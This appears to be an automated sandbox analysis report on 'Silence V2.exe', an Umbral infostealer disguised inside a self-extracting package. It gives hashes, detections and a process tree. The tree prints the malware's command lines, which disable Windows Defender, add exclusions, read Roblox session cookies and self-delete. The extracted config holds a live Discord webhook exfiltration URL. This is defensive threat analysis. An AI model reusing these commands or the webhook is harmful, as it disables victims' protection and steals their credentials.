Analysis
-
max time kernel
12s -
max time network
13s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
26-06-2024 07:05
Static task
static1
Behavioral task
behavioral1
Sample
Silence V2.rar
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
Silence V2.exe
Resource
win10v2004-20240611-en
General
-
Target
Silence V2.exe
-
Size
1.4MB
-
MD5
b92e01644e5b593e8f0baa16b3ff9d01
-
SHA1
c09365ce18f7c0262ff1d5e673aac84741df7138
-
SHA256
56bfd3850d503982e6d3e0f7a48ac1252156a509e0054f414f0d678f64af50a7
-
SHA512
213bb3e16800a7f7fa78937c4015ce21e3854a90090ee9f7ef568131a6dde70016689e531dd2440314407dcd6d4c90cc36a2e6f3e2aceb07c89bf76a9c4c252c
-
SSDEEP
24576:6Oy0DmBXDJbwwZXTOas/C4betyp3SVJWX0o+0G+rcxIV0zMqmzXch:M0DmBXDtAt7Ky3SVEX0/0G+joMqmbc
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1242661037388468314/b-NP7qDhXngDoB6CdNXbSrZqZBdCUwxa5k7R0G43X2NEHvaGtjHVsZ3e2VkStAGOjujz
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/files/0x000700000002342f-8.dat family_umbral behavioral2/memory/860-11-0x0000018DEE7F0000-0x0000018DEE830000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4344 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Discord.exe -
Executes dropped EXE 2 IoCs
pid Process 436 SILENC~1.EXE 860 Discord.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Silence V2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 33 discord.com 34 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2948 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4344 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 860 Discord.exe 4344 powershell.exe 4344 powershell.exe 1080 powershell.exe 1080 powershell.exe 3392 powershell.exe 3392 powershell.exe 2420 powershell.exe 2420 powershell.exe 2188 powershell.exe 2188 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 860 Discord.exe Token: SeIncreaseQuotaPrivilege 3284 wmic.exe Token: SeSecurityPrivilege 3284 wmic.exe Token: SeTakeOwnershipPrivilege 3284 wmic.exe Token: SeLoadDriverPrivilege 3284 wmic.exe Token: SeSystemProfilePrivilege 3284 wmic.exe Token: SeSystemtimePrivilege 3284 wmic.exe Token: SeProfSingleProcessPrivilege 3284 wmic.exe Token: SeIncBasePriorityPrivilege 3284 wmic.exe Token: SeCreatePagefilePrivilege 3284 wmic.exe Token: SeBackupPrivilege 3284 wmic.exe Token: SeRestorePrivilege 3284 wmic.exe Token: SeShutdownPrivilege 3284 wmic.exe Token: SeDebugPrivilege 3284 wmic.exe Token: SeSystemEnvironmentPrivilege 3284 wmic.exe Token: SeRemoteShutdownPrivilege 3284 wmic.exe Token: SeUndockPrivilege 3284 wmic.exe Token: SeManageVolumePrivilege 3284 wmic.exe Token: 33 3284 wmic.exe Token: 34 3284 wmic.exe Token: 35 3284 wmic.exe Token: 36 3284 wmic.exe Token: SeIncreaseQuotaPrivilege 3284 wmic.exe Token: SeSecurityPrivilege 3284 wmic.exe Token: SeTakeOwnershipPrivilege 3284 wmic.exe Token: SeLoadDriverPrivilege 3284 wmic.exe Token: SeSystemProfilePrivilege 3284 wmic.exe Token: SeSystemtimePrivilege 3284 wmic.exe Token: SeProfSingleProcessPrivilege 3284 wmic.exe Token: SeIncBasePriorityPrivilege 3284 wmic.exe Token: SeCreatePagefilePrivilege 3284 wmic.exe Token: SeBackupPrivilege 3284 wmic.exe Token: SeRestorePrivilege 3284 wmic.exe Token: SeShutdownPrivilege 3284 wmic.exe Token: SeDebugPrivilege 3284 wmic.exe Token: SeSystemEnvironmentPrivilege 3284 wmic.exe Token: SeRemoteShutdownPrivilege 3284 wmic.exe Token: SeUndockPrivilege 3284 wmic.exe Token: SeManageVolumePrivilege 3284 wmic.exe Token: 33 3284 wmic.exe Token: 34 3284 wmic.exe Token: 35 3284 wmic.exe Token: 36 3284 wmic.exe Token: SeDebugPrivilege 4344 powershell.exe Token: SeDebugPrivilege 1080 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeIncreaseQuotaPrivilege 5032 wmic.exe Token: SeSecurityPrivilege 5032 wmic.exe Token: SeTakeOwnershipPrivilege 5032 wmic.exe Token: SeLoadDriverPrivilege 5032 wmic.exe Token: SeSystemProfilePrivilege 5032 wmic.exe Token: SeSystemtimePrivilege 5032 wmic.exe Token: SeProfSingleProcessPrivilege 5032 wmic.exe Token: SeIncBasePriorityPrivilege 5032 wmic.exe Token: SeCreatePagefilePrivilege 5032 wmic.exe Token: SeBackupPrivilege 5032 wmic.exe Token: SeRestorePrivilege 5032 wmic.exe Token: SeShutdownPrivilege 5032 wmic.exe Token: SeDebugPrivilege 5032 wmic.exe Token: SeSystemEnvironmentPrivilege 5032 wmic.exe Token: SeRemoteShutdownPrivilege 5032 wmic.exe Token: SeUndockPrivilege 5032 wmic.exe Token: SeManageVolumePrivilege 5032 wmic.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 3512 wrote to memory of 436 3512 Silence V2.exe 82 PID 3512 wrote to memory of 436 3512 Silence V2.exe 82 PID 3512 wrote to memory of 860 3512 Silence V2.exe 84 PID 3512 wrote to memory of 860 3512 Silence V2.exe 84 PID 860 wrote to memory of 3284 860 Discord.exe 86 PID 860 wrote to memory of 3284 860 Discord.exe 86 PID 860 wrote to memory of 5076 860 Discord.exe 91 PID 860 wrote to memory of 5076 860 Discord.exe 91 PID 860 wrote to memory of 4344 860 Discord.exe 93 PID 860 wrote to memory of 4344 860 Discord.exe 93 PID 860 wrote to memory of 1080 860 Discord.exe 95 PID 860 wrote to memory of 1080 860 Discord.exe 95 PID 860 wrote to memory of 3392 860 Discord.exe 97 PID 860 wrote to memory of 3392 860 Discord.exe 97 PID 860 wrote to memory of 2420 860 Discord.exe 99 PID 860 wrote to memory of 2420 860 Discord.exe 99 PID 860 wrote to memory of 5032 860 Discord.exe 103 PID 860 wrote to memory of 5032 860 Discord.exe 103 PID 860 wrote to memory of 2660 860 Discord.exe 105 PID 860 wrote to memory of 2660 860 Discord.exe 105 PID 860 wrote to memory of 4420 860 Discord.exe 107 PID 860 wrote to memory of 4420 860 Discord.exe 107 PID 860 wrote to memory of 2188 860 Discord.exe 109 PID 860 wrote to memory of 2188 860 Discord.exe 109 PID 860 wrote to memory of 2948 860 Discord.exe 111 PID 860 wrote to memory of 2948 860 Discord.exe 111 PID 860 wrote to memory of 2176 860 Discord.exe 114 PID 860 wrote to memory of 2176 860 Discord.exe 114 PID 2176 wrote to memory of 4344 2176 cmd.exe 116 PID 2176 wrote to memory of 4344 2176 cmd.exe 116 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5076 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"C:\Users\Admin\AppData\Local\Temp\Silence V2.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SILENC~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SILENC~1.EXE2⤵
- Executes dropped EXE
PID:436
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Discord.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Discord.exe2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Discord.exe"3⤵
- Views/modifies file attributes
PID:5076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Discord.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2660
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:4420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2188
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2948
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Discord.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:4344
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
948B
MD5966914e2e771de7a4a57a95b6ecfa8a9
SHA17a32282fd51dd032967ed4d9a40cc57e265aeff2
SHA25698d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba
SHA512dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5
-
Filesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
Filesize
1KB
MD5b5e2fd95470c50743ba121fd6bd03a7b
SHA175545ed499d9dde51a1fc1cf535eb4f50ec79250
SHA256d9c961aaf784b9ce81b0a3aac7a39bd41e9f2702d9c28deb20e786d385b88288
SHA51276bdc793f8b38f603b5ad0957474660bb09e963a2496564b8ceac6591d532fc9498214b81c3908bafc13ff0b07028457c6c997998adfd2203304cb1c82899423
-
Filesize
227KB
MD576c5e8fd03ce0b5a961b5223ce3285ba
SHA1c4e7128c9bad0414de8e29581347134504c06d76
SHA256b9a0ae4a08f4607671b4078a06a9b0b20bb5785835542fc795751842afa45638
SHA5121d1ae0a49bd1933f53a78a07fd291bb3479fde212c1c7fd8274576bedaaafc9ecc09703941ee96f9e008f8e543affbdb999f73332489455e0a63987047cbc81a
-
Filesize
2.2MB
MD562d1385a94be14ac023001ac2fe31aca
SHA1c82aea0d4f592ed2889e6bfe1ff267b46da65efc
SHA25640274d0aef0b5426aa0be739faa121862aeb1af18559d05d2830dd4c415a0008
SHA5121703bd4088996008ad44ad63caff5528b5657f2c259cced5c5862df355b05673cedd9ca718ef637cf96320e7a3ec6a98ff0ba469f4f0dde18978de3cfd7b6329
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82